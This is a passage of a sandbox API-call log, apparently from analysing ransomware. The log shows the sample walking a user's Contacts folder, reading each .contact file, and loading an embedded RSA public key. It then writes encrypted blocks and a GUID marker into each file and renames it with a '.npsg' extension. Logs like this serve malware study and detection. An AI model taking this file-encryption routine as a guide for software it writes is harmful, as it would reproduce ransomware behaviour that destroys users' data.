Flags=0x0, Size=0x4) returned 0x3b7f918 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffc0 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff30 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff78 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff48 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.888] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.888] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0235.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.888] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.888] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0235.888] CloseHandle (hObject=0x644) returned 1 [0235.889] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.npsg")) returned 1 [0235.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.890] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0235.892] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0235.892] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0235.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0235.892] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0235.892] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0235.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0235.894] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1174) returned 1 [0235.894] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0235.897] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.897] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0235.899] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x496, lpOverlapped=0x0) returned 1 [0235.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.899] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.899] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0235.900] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0235.900] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0235.900] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0235.900] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0235.900] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.901] SetLastError (dwErrCode=0x0) [0235.901] GetLastError () returned 0x0 [0235.902] SetLastError (dwErrCode=0x0) [0235.902] GetLastError () returned 0x0 [0235.902] SetLastError (dwErrCode=0x0) [0235.902] GetLastError () returned 0x0 [0235.902] SetLastError (dwErrCode=0x0) [0235.902] GetLastError () returned 0x0 [0235.902] SetLastError (dwErrCode=0x0) [0235.902] GetLastError () returned 0x0 [0235.902] SetLastError (dwErrCode=0x0) [0235.902] CryptDestroyHash (hHash=0x33f0408) returned 1 [0235.902] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0235.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0235.902] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0235.902] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0235.902] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0235.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a0) returned 0x3b7a060 [0235.902] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0235.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x6962b0 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x346fd28 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7d40 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffee8 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6945a8 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff30 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff18 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0235.903] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x3b947f8 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b94a18 [0235.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0235.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0235.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a18 | out: hHeap=0x620000) returned 1 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff18 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0235.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33fffc0 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x33b8188 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff18 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff78 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0235.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.904] GetCurrentThreadId () returned 0x5b4 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687dc0 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0235.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.905] GetCurrentThreadId () returned 0x5b4 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff78 [0235.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0235.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0235.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0235.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff18 [0235.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0235.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffea0 [0235.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fff90 [0235.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0235.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0235.907] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.907] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0235.907] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.907] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0235.907] CloseHandle (hObject=0x644) returned 1 [0235.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b947f8 [0235.910] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.npsg")) returned 1 [0235.912] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0235.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0235.912] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0235.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0235.913] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1172) returned 1 [0235.913] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0235.916] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.916] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0235.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.919] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x494, lpOverlapped=0x0) returned 1 [0235.919] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x6962b0 [0235.919] lstrlenA (lpString="-----BEGIN PUBLIC 